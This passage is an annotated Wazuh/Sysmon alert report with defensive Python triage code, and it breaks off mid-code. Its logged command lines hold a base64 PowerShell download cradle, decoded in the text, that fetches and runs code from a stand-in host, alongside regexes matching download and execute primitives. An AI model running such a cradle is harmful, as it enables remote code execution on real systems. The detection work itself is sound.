data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.607+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.607+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1294509
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:57.8932258Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283301
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:57.856 ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ProcessId: 5848 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1 CreationUtcTime: 2025-04-24 22:36:57.856 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:57.856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd07-680a-160b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5848
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:57.856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.980+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.980+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1297274
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:00.1422661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283325
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:58.891 ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ProcessId: 11360 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ParentProcessId: 5848 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full rendered event text from which every data.win.eventdata field below is parsed. Read it when a parsed field looks truncated or oddly escaped; the JSON view doubles backslashes and escapes quotes.

data.win.eventdata.utcTime:  2025-04-24 22:36:58.891
When Sysmon observed the process start (UTC). Use this, not the Wazuh timestamp, to order host events.

data.win.eventdata.processGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
Sysmon GUID for the new process, unique across reboots (PIDs are recycled). This is the pivot key: the same value appears as processGuid on the EID 11 file creates and as parentProcessGuid on the child EID 1 of this process.

data.win.eventdata.processId:  11360
Windows PID. Reused after the process exits, so correlate on processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable launched – the built-in Windows PowerShell 5.1 host. A copy running from any other path is suspicious in itself.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the image's PE resource; confirms which Windows build of powershell.exe ran.

data.win.eventdata.description:  Windows PowerShell
PE version-info string. Trivial to fake in a custom binary, so use it to spot oddities, not to establish trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
PE version-info string (see description).

data.win.eventdata.company:  Microsoft Corporation
PE version-info string (see description).

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE header. If it differs from the image name (PowerShell.EXE running as, say, svchost.exe), the binary was renamed to dodge name-based detection.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 of the UTF-16LE script, so decode it before judging the alert; this one resolves to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). -NoLogo -NoProfile and a duplicated image path are typical of scripted launches. PowerShell also accepts abbreviations such as -e or -enc, so do not match on the full switch name only.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process – where it was launched from. A user profile root is consistent with an interactive or script launch.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as (DOMAIN\user). The domain part equals the hostname, so this is a local account, not a domain identity.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Pivot to Security event 4624 with the same Logon GUID to see how and from where this session was established.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Also present in 4624 and 4688, so every process from this session can be pulled with one filter.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services, 1 or higher = an interactive user session (console or RDP).

data.win.eventdata.integrityLevel:  Medium
Process integrity: Low / Medium / High / System. Medium is a non-elevated user; High means an elevated admin token, System a service-level one.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file (algorithms per the Sysmon config). For a Microsoft-signed powershell.exe it mainly confirms the binary is the genuine one; it says nothing about the script it ran.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd07-680a-160b-000000000e00}
Sysmon GUID of the parent. Search for it as processGuid on an earlier EID 1 to walk the tree upward; if no such event exists, the parent predates Sysmon or its event was not forwarded.

data.win.eventdata.parentProcessId:  5848
PID of the parent at spawn time.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell is what this rule keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Here it is identical to the child's, including the same -EncodedCommand payload: the encoded script relaunched itself rather than being started by a different program.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A different user between parent and child points at impersonation or a privilege change; here they match.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:10.142+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Check the file before treating it as a transferred tool: data.win.eventdata.targetFilename is __PSScriptPolicyTest_gypnpqaz.wjv.ps1 in the user's %TEMP%, the probe file Windows PowerShell writes on every start-up to test AppLocker/WDAC script enforcement, and the creator is powershell.exe itself. The file is a host artifact; the real signal is the process that wrote it. Pivot on processGuid {94294ddc-bd0a-680a-190b-000000000e00} (PID 11360) to its EID 1 alert and decode the -EncodedCommand there.
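The created file deserves a closer look before it is counted as a transferred tool. Its path, C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1, is the probe file Windows PowerShell writes to %TEMP% on every start-up to test whether AppLocker/WDAC script enforcement applies; the creator is powershell.exe itself, and the Sysmon processGuid ties it to the EID 1 alert for the same PID 11360. The Python below is an added triage example written for this report, not SOCscribe or Wazuh code: it indexes EID 1 events by processGuid, joins each EID 11 file create to its creating process, and separates the policy-probe artifact from anything else a script host drops into a staging folder. The events are constructed from the fields shown on this page; the update.exe case is hypothetical, added for contrast.

```python
import ntpath
import re

# Windows PowerShell writes %TEMP%\__PSScriptPolicyTest_<8 random>.<3 random>.ps1 at
# start-up to test AppLocker/WDAC script enforcement. It is a host artifact, not a
# payload, but EID 11 rules keyed on "script dropped in Temp" fire on it.
PS_POLICY_PROBE = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
EXEC_EXTS = {".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".scr", ".hta", ".lnk"}
DROP_DIRS = ("\\appdata\\local\\temp", "\\windows\\temp", "\\programdata",
             "\\users\\public", "\\appdata\\roaming")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:%s)(?=\s)" % _PREFIXES)


def index_by_guid(eid1_events):
    """Key EID 1 records on ProcessGuid: it survives PID reuse, the PID does not."""
    return {e["processGuid"]: e for e in eid1_events}


def triage_file_create(ev, procs_by_guid):
    """Classify a Sysmon EID 11 record, using the creating EID 1 when we have it."""
    path = ev["targetFilename"]
    name = ntpath.basename(path)
    folder = ntpath.dirname(path).lower()
    # Sysmon copies the creating image onto the EID 11, so this works without the EID 1.
    creator_image = ntpath.basename(ev.get("image", "")).lower()
    creator = procs_by_guid.get(ev["processGuid"])
    if (PS_POLICY_PROBE.match(name) and creator_image in SCRIPT_HOSTS
            and folder.endswith("\\temp")):
        return {"file": name, "verdict": "powershell_policy_probe", "creator_pid": ev["processId"],
                "reasons": ["PowerShell start-up AppLocker/WDAC probe file, not a transferred tool"]}
    reasons = []
    ext = ntpath.splitext(name)[1].lower()
    if ext in EXEC_EXTS:
        reasons.append(f"executable/script extension {ext}")
    if any(d in folder for d in DROP_DIRS):
        reasons.append("written to a user-writable staging folder")
    if creator_image in SCRIPT_HOSTS:
        reasons.append(f"written by script host {creator_image}")
    if creator and ENCODED_SWITCH.search(creator["commandLine"]):
        reasons.append(f"creator PID {creator['processId']} was launched with an encoded command; pivot to its EID 1")
    return {"file": name, "verdict": "review", "creator_pid": ev["processId"], "reasons": reasons}


# Sample data constructed from the EID 1 and EID 11 alerts on this page (PID 11360).
ENC = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
       "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
       "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENC}'
GUID_11360 = "{94294ddc-bd0a-680a-190b-000000000e00}"

EID1_EVENTS = [{"processGuid": GUID_11360, "processId": 11360, "image": PS, "commandLine": CMD,
                "parentProcessGuid": "{94294ddc-bd07-680a-160b-000000000e00}"}]
EID11_EVENTS = [
    {"processGuid": GUID_11360, "processId": 11360, "image": PS,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1"},
    # Hypothetical contrast case (not on the page): the same process drops a PE into Temp.
    {"processGuid": GUID_11360, "processId": 11360, "image": PS,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\update.exe"},
]

if __name__ == "__main__":
    procs = index_by_guid(EID1_EVENTS)
    for ev in EID11_EVENTS:
        print(triage_file_create(ev, procs))
```

The probe verdict only downgrades the file, never the alert: the reasons list for anything else a script host writes still carries the pointer back to the creating EID 1, which is where the encoded command lives.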

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:10.142+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534230.1305341
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the event IDs and field names follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. A stable filter key when provider names vary.

data.win.system.eventID:  11
Event ID within the provider's channel. For Sysmon: 1 = Process Create, 3 = Network Connection, 11 = FileCreate. These are not Security-log IDs such as 4624 or 4688, even though the numbers are small.

data.win.system.version:  2
Schema version of this event type. When Sysmon bumps it, fields may be added or reordered and decoders or rules can need updating.

data.win.system.level:  4
Numeric level: 4 = Information, 3 = Warning, 2 = Error. Sysmon logs almost everything at 4, so severity comes from the rule, not from here.

data.win.system.task:  11
Task category. Sysmon sets it to the same number as the event ID, so it adds nothing beyond eventID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:00.3905368Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime, the moment Sysmon observed the action; a large gap points at a busy or backlogged host.

data.win.system.eventRecordID:  283335
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported. The subject's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the logging (Sysmon) process. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational is Sysmon telemetry; confirm it is being forwarded and that its size limit is not rolling events off before the agent reads them.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. It should match agent.name; a mismatch means the event was forwarded from another host or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:00.377 ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ProcessId: 11360 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1 CreationUtcTime: 2025-04-24 22:37:00.377 User: Attacker\Attcker1"
Full rendered event text from which every data.win.eventdata field below is parsed. Read it when a parsed field looks truncated or oddly escaped; the JSON view doubles backslashes and escapes quotes.

data.win.eventdata.utcTime:  2025-04-24 22:37:00.377
When Sysmon observed the file being created (UTC). Use this, not the Wazuh timestamp, to order host events.

data.win.eventdata.processGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
Sysmon GUID of the process that wrote the file. It is unique across reboots (PIDs are recycled) and equals the processGuid on the Process Create alert for PID 11360 above – the pivot that joins this file create to the encoded PowerShell command.

data.win.eventdata.processId:  11360
Windows PID of the writer. Reused after exit, so correlate on processGuid.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Here powershell.exe itself, which matters for the next field.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gypnpqaz.wjv.ps1
Full path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is the probe file Windows PowerShell writes on start-up to test AppLocker/WDAC script enforcement; it is a host artifact, not a tool brought in by the attacker. The rule fires on location and extension, so keep the alert for the process chain, not for this file.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:00.377
Creation timestamp carried by the file. Normally equals utcTime; an older value means an existing file was overwritten or its timestamp was changed (see Sysmon EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Account whose process wrote the file (DOMAIN\user). The domain part equals the hostname, so this is a local account.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:10.893+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell. Decode the -EncodedCommand argument (base64 of the UTF-16LE script) before judging it; here it resolves to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle that fetches remote code and runs it in memory. The parent (PID 11360) is powershell.exe with the identical command line, and its own parent (PID 5848) launched the same thing, so follow parentProcessGuid until you reach the non-PowerShell process that started the chain, and check Sysmon EID 3 and proxy logs for the connection to example.com.
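The encoded command in this alert is opaque until decoded, and -EncodedCommand is base64 over the UTF-16LE bytes of the script, not UTF-8, so a plain base64 decode yields interleaved NULs. The Python below is an added example written for this report, not SOCscribe or Wazuh code: it pulls the encoded argument out of a Sysmon command line (accepting the abbreviated switch forms powershell.exe allows, such as -e and -enc), decodes it, and flags the fetch-and-execute pairing that makes a one-liner a download cradle. The sample command line is the CommandLine field from this alert; the Get-Date command line is a constructed contrast case.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % _PREFIXES)

# Fetch primitives and execute primitives; both together make a download cradle.
FETCH = re.compile(r"(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest"
                   r"|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer|net\.webclient")
EXEC = re.compile(r"(?i)\biex\b|invoke-expression|invoke-command|\bicm\b|\[scriptblock\]::create")
URL = re.compile(r"https?://[^\s'\"<>)]+")


def extract_encoded(cmdline):
    """Return the base64 argument of -EncodedCommand (any accepted prefix), or None."""
    m = ENCODED_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded(b64):
    """-EncodedCommand carries the UTF-16LE bytes of the script; tolerate stripped padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


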